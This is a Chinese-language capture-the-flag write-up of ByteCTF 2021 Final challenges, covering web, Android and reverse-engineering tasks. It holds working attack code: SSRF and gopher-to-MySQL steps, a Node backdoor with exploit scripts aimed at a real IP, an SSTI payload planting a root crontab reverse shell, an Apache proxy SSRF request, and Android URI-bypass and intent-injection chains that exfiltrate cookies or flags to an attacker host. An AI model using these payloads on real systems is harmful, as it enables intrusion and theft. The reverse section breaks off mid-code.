ByteCTF 2021 Final By W&M
WEB
SEO
到处点首页有一堆api/xxx.php。这里能下载文件。抓到
api/word.php?src=6b77af.txt读源码。/api/ip.php
<?php
error_reporting(0);
$domain = $_POST['domain'];
$ip = "1.1.1.1";
$site_title = "";
$content = "";
try {
$ip = gethostbyname($domain);
} catch (Exception $e)
{
$ip = "域名解析异常";
}
if(!preg_match("/file:/i", $domain)){
try {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $domain);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($c);
$content = base64_encode($data);
curl_close($c);
$pos = strpos($data,'utf-8');
if($pos===false){
$data = iconv("gbk","utf-8",$data);
}
preg_match("/<title>(.*)<\/title>/i",$data, $title);
$site_title = $title[1];
} catch (Exception $e)
{
$content = "error";
$site_title = "网站访问异常";
}
} else
{
$content = "error";
$site_title = "网站访问异常";
}
$ip_addr = array (
"ip" => $ip,
"title" => $site_title,
"res" => $content
);
header('Content-Type:text/json;charset=utf-8');
$ip_json = json_encode($ip_addr);
echo $ip_json;
再扫100的端口。得到3306.然后gopher写udf-命令执行
bytehouse
clihouse。列数据库发现有information_Schema。可能链接mysql的
报错得到jdbc的链接字符串
jdbc mysql任意文件读。
读cmdline等文件
%java-XX:+UseContainerSupport-XX:+IdleTuningCompactOnIdle-XX:+IdleTuningGcOnIdle-Xdump:none-Xdump:tool:events=systhrow+throw,filter=*OutOfMemoryError,exec=kill -9 %pid-Dlog4j.configuration=file:////app/log4j.properties-Dnashorn.args=--language=es6-jarclickhouse-jdbc-bridge-shaded.jar知道是用clickhouse-jdbc-bridge-shaded.jar起的
https://github.com/ClickHouse/clickhouse-jdbc-bridge/tree/master/misc/quick-start
docker下下来有个logs
用jdbc mysql读文件读logs的console.log
拿密码查下flag就行
nothing
1 ByteCTF[length]=4000绕过ByteCTF.length检测
2 ByteCTF[toString][]=使 字符串+ByteCTF+字符串 报错
3 由于exec没有降权,所以可以kill掉父进程 node。kill掉node,在node被脚本拉起之前,自己生一个生瓜蛋子占用:3000,启动自己的服务来回显(/tmp目录似乎不可写,用node -e直接传脚本执行)
(或者:用kill掉node 导致 http请求失败,来cut盲注flag,但是不稳定
[ `cut -b 1 /flagfilename` == x ] && pkill node)//evil.js
const express = require('express')
const fs = require('fs')
const execSync = require('child_process').execSync;
const app = express()
app.get('/yyds', (req, res) => { //防蹭车
res.send("SUCCESS:"+execSync(req.query.asdasdasdx).toString())
res.end()
})
app.listen(3000, () => {
console.log(`listening at port 3000`)
}) import requests
import base64
remote_url = "http://39.106.69.116:30001/?ByteCTF[length]=4000&ByteCTF[toString][]=&backdoor="
def encode(sth):
result = ""
for i in sth:
result += "%%%02x" % ord(i)
return result
def execute_command(cmd):
url = remote_url + encode(cmd)
r = requests.get(url,proxies={"http":"http://localhost:4476"})
return r.status_code
evil_js_b64 = None
with open("evil.js","rb") as file:
evil_js_b64 = file.read()
evil_js_b64 = base64.b64encode(evil_js_b64).decode()
while 1:
execute_command(f"pkill node;node -e \"`echo {evil_js_b64} | base64 -d`\"")
import requests
import base64
remote_url1 = "http://39.106.69.116:30001/yyds?asdasdasdx="
def encode(sth):
result = ""
for i in sth:
result += "%%%02x" % ord(i)
return result
def fetch_result(cmd):
url = remote_url1 + encode(cmd)
r = requests.get(url,proxies={"http":"http://localhost:4476"})
return r.text if "SUCCESS:" in r.text else None
while 1:
#fetch_result("ls /")
a = fetch_result("cat /Th1s_1s_f1a9_31567878cd3283f5d02ccd5ea1d15aafadf1943ae39180ad96e74f3f0c1bbc3e")
if a:
print(a)
bytectf{50579195da002fa989432cbc1a83e38f5d3765122d9a7d4d767f99a61fa58f22}Babyweb
golang ssti gin的框架
用户名ssti
能上传任意文件 写crontab 反弹shell
{{.SaveUploadedFile (.FormFile "glzjin1") "/var/spool/cron/crontabs/root"}}
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.F1jRTz/crontab installed on Sat Dec 11 12:53:26 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
* * * * * bash -c 'bash -i >& /dev/tcp/xxx/9999 0>&1'proxy
可以用apache2.4.48那个cve进行内网ssrf
GET /proxy?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://internal/fetch通过这种方式可以SSRF到内网的python服务 然后发现python是requests发包 使用proxy进行代理认证
使用https 302 将请求头保存下来即可完成
1.php
<?php
file_put_contents("xxx.log",json_encode($_SERVGER));
header('location: https:/xxxxx/xxxx/2.php');?>2.php
<?php
header('location: https://xxxx/xxxx/1.php')用url参数请求1.php
拿到认证头解密即可
Mobile
HardDroid
1. 反射构造hearachical Uri绕过
在程序中直接从 Intent 中取 Uri,并且对取出的内容检验了 Host 和 Scheme,但是在通过 loadUrl 的时候没有经过 Uri.parse,而是通过 toString 来放到了loadUrl中,造成可以通过反射构造 hearachical Uri 绕过,在 https://www.anquanke.com/post/id/182420#h2-5 文章中有提到对应的利用思路。
其中也提到了,在高版本中,反射调用会在运行时报错失败。
由于这道题使用的是Android API 30,也就是 Android R,存在 Google 的这个限制,所以我们通过它给出绕过方法中的链接:https://github.com/tiann/FreeReflection,使用 FreeReflection 这个工具来进行攻击,其原理在 https://weishu.me/2018/06/07/free-reflection-above-android-p/ 中被详细解释,我们这边直接拿来用就好。
我将其封装为一个类来进行调用
public Uri getUri(String attackerUri) {
String TAG = "WJH";
Uri uri;
try {
Class partClass = Class.forName("android.net.Uri$Part");
Constructor partConstructor = partClass.getDeclaredConstructors()[0];
partConstructor.setAccessible(true);
Class pathPartClass = Class.forName("android.net.Uri$PathPart");
Constructor pathPartConstructor = pathPartClass.getDeclaredConstructors()[0];
pathPartConstructor.setAccessible(true);
Class hierarchicalUriClass = Class.forName("android.net.Uri$HierarchicalUri");
Constructor hierarchicalUriConstructor = hierarchicalUriClass.getDeclaredConstructors()[0];
hierarchicalUriConstructor.setAccessible(true);
Object authority = partConstructor.newInstance("app.toutiao.com", "app.toutiao.com");
Object path = pathPartConstructor.newInstance("@" + attackerUri, "@" + attackerUri);
uri = (Uri) hierarchicalUriConstructor.newInstance("http", authority, path, null, null);
Log.d(TAG, "Scheme: " + uri.getScheme());
Log.d(TAG, "Authority: " + uri.getAuthority());
Log.d(TAG, "UserInfo: " + uri.getUserInfo());
Log.d(TAG, "Host: " + uri.getHost());
Log.d(TAG, "toString(): " + uri.toString());
} catch (Exception e) {
throw new RuntimeException(e);
}
return uri;
}2.调用内部未 exported 类
根据初赛的题目我了解过这个思路,这里可以参考 http://blog.wjhwjhn.com/archives/613/ 这篇文章,这里简单的做一个说明。
在 MainActivity 中,程序对 shouldOverrideUrlLoading 进行了一个重写,并且在访问链接的 scheme 为 intent的情况下会进行一个拦截,同时先通过 parseUri 来解析传入参数,再使用 startActivity 对传入内容进行一个启动。这个来自内部的启动,使得我们可以调用内部的类。
这里在转换时需要选择 Intent.URI_INTENT_SCHEME 的这种形式,可以转换出可以被直接访问到的 Uri
Intent i2 = new Intent();
i2.setClassName("com.bytectf.harddroid", "com.bytectf.harddroid.TestActivity");
i2.setData(Uri.parse("http://app.toutiao.com"));
String uri_data = i2.toUri(Intent.URI_INTENT_SCHEME);3.Universal-XSS
相关操作可以参考 https://twitter.com/_bagipro/status/1326511441306935296
在 TestActivity 类中,我们可以通过在启动时写一个 Intent.FLAG_ACTIVITY_SINGLE_TOP 标志,使得第二次访问时,没有执行 onCreate 去 重新创建一个 WebView,而是通过 onNewIntent 来调用 loadUrl,在这种情况下,我们可以在第二次调用时来执行 javascript: xxx 这样的语句,从而实现在通过域名白名单的情形下来执行我们恶意的 JavaScript 代码。
4.恶意 JS 代码执行
通过分析题目中的 native 函数中的 native_write 函数,可以发现可以指定文件名来进行任意的写入,再结合代码中存在一个对 soPath 是否存在的判定,此判定允许二次载入 so 文件,不难想到我们可以通过 native_write 来在目录下写入一个 恶意的 so 文件,在此 so 文件的 JNI_Onload 函数中做一个实现,使得这个恶意的 so 文件可以在 JAVA 程序 load 之后将目录下的 flag 读出并访问我们指定的 web 链接从而带出 flag,可惜的是我之前都没接触过 native 文件的编写,于是拜托了战队中的 RE 神 —— 源神来搞定了这部分!源哥 yyds!
html 中的三次跳转代码解释
- 传入 url 参数跳转内容,实际上就是我们要跳转到的 http://app.toutiao.com 白名单网址
- 去通过 Intent.FLAG_ACTIVITY_SINGLE_TOP 标志(launchFlags=0x20000000)去执行 JavaScript,从而调用到 jsi 中的写函数,把恶意的 so 文件写出到目录下。
- 等待写入后再去访问白名单网址,此时会检测到 soPath 的文件内容存在,同时使用了 System.load 去加载文件,加载中会自动去调用 so 文件中的 JNI_Onload,在其中把 flag 内容带出。
<html>
<body>
<script>
function GetQueryString(name)
{
var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if(r!=null)return unescape(r[2]); return null;
}
function doitjs()
{
location.href = decodeURIComponent(decodeURIComponent(GetQueryString('url')));
}
function doitjs2()
{
location.href = 'intent:jsi.write_file("/data/user/0/com.bytectf.harddroid/files/libUtils.so", "恶意so文件的base64代码")#Intent;scheme=javascript;launchFlags=0x20000000;component=com.bytectf.harddroid/.TestActivity;end';
}
setTimeout(doitjs, 0);
setTimeout(doitjs2, 3000);
setTimeout(doitjs, 15000);
</script>
</body>
</html>ByteDraid1
1 用..%2F..逃逸路径
2 任意域名均可http://domain/local_cache/ 逃逸到自己的.html文件,因此可以跳转,访问tiktok.com的cookie
3 chmod 777 自己的文件(需要自己的TargetSDKVersion低)//MainActivity
//TargetSDKVersion越低越好,高了不能chmod 自己的data文件夹
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setup_our_file();
if(true) {
Intent target = new Intent();
target = getPackageManager().getLaunchIntentForPackage("com.bytectf.bytedroid1");
target.setData(Uri.parse("http://bytectf.toutiao.com/local_cache/..%2F../com.bytectf.pwnbytedroid1/files/1.html"));
startActivity(target);
}
}
private void setup_our_file() {
try {
Runtime.getRuntime().exec(new String[]{"/system/bin/sh","-c",
"mkdir /data/data/com.bytectf.pwnbytedroid1/files;"+
"echo '<html><head></head><body>1 page</body><script>window.location.href=\"http://tiktok.com/local_cache/..%2F..%2F..%2F..%2F../data/data/com.bytectf.pwnbytedroid1/files/3.html\";</script></html>' > /data/data/com.bytectf.pwnbytedroid1/files/1.html;"+
"chmod 777 /data/data/com.bytectf.pwnbytedroid1/;"+
"chmod 777 /data/data/com.bytectf.pwnbytedroid1/files;"+
"chmod 777 /data/data/com.bytectf.pwnbytedroid1/files/1.html;" +
"echo '<html><head></head><body>3 page</body><script>fetch(\"http://VPS_IP/flag?\"+document.cookie)</script></html>' > /data/data/com.bytectf.pwnbytedroid1/files/3.html;"+
"chmod 777 /data/data/com.bytectf.pwnbytedroid1/files/3.html;"
});
} catch (IOException e) {
Log.d("AndroidRuntime","err",e);
e.printStackTrace();
}
}
Reverse
byteService
拿到APK文件后,使用Jadx-gui打开APK文件,发现应该是一个考察Binder机制的题目,transact()函数前面16次分别对应的code为1-16,每次transact时传递一个参数过去,当code为17时进行flag的check工作,那么非常明显对应的系统中有一个ByteCTFService的Binder服务端。
public boolean checkText(EditText editText) {
int i = 0;
while (i < 16) {
try {
char charAt = editText.getText().charAt(i);
i++;
callCTFService(i, charAt);
} catch (AssertionError unused) {
return false;
}
}
return true;
}
public void callCTFService(int i, int i2) {
try {
Class<?> cls = Class.forName("android.os.ServiceManager");
Parcel obtain = Parcel.obtain();
Parcel obtain2 = Parcel.obtain();
obtain.writeInterfaceToken("android.os.IByteCTFService");
obtain.writeInt(i2);
((IBinder) cls.getMethod("getService", String.class).invoke(cls.newInstance(), "ByteCTFService")).transact(i, obtain, obtain2, 0);
obtain2.readException();
} catch (RemoteException | ClassNotFoundException | IllegalAccessException | InstantiationException | NoSuchMethodException | InvocationTargetException e) {
e.printStackTrace();
}
}
public boolean checkCTFService() {
try {
Class<?> cls = Class.forName("android.os.ServiceManager");
Parcel obtain = Parcel.obtain();
Parcel obtain2 = Parcel.obtain();
obtain.writeInterfaceToken("android.os.IByteCTFService");
((IBinder) cls.getMethod("getService", String.class).invoke(cls.newInstance(), "ByteCTFService")).transact(17, obtain, obtain2, 0);
obtain2.readException();
return obtain2.readBoolean();
} catch (RemoteException | ClassNotFoundException | IllegalAccessException | InstantiationException | NoSuchMethodException | InvocationTargetException e) {
e.printStackTrace();
return false;
}
}那么通用的系统中肯定是没有相应的android.os.IByteCTFService的interface以及ByteCTFService的类的,再次观察题目提示会发现给了一个链接,打开网页后拖到最下面得到相应系统的镜像latest.zip文件。
一开始我想的是直接提取img中的文件,但是发现system.img不是ext4格式,也没有现成的模拟器的img的工具,所以选择将镜像跑起来吧。
使用AS自带的emulator指定下载的镜像启动模拟器,但是我这里最终一直处在开机状态幸好不影响adb,考虑到ByteCTFService的类名,我大致猜到对应的类在 /system/framework/目录的framework.jar和service.jar中,可以通过grep命令确认一下。
在提取出两个jar文件后,使用Jadx-gui打开后会发现存在一个A类封装了一批绕来绕去的Function函数,把我给绕晕了。。
暂时看不出来这个类的作用,但是在发现ByteCTFServiceImpl后你就会发现,大量引用了这个类中的函数。
回到正题,对应Binder机制的transact函数,首先看onTransact函数,其内容大致如下,这就对应了上述的分析“transact()函数前面16次分别对应的code为1-16,每次transact时传递一个参数过去,当code为17时进行flag的check工作,那么非常明显对应的系统中有一个ByteCTFService的Binder服务端。”
public boolean onTransact(int code, Parcel data, Parcel reply, int flags) throws RemoteException {
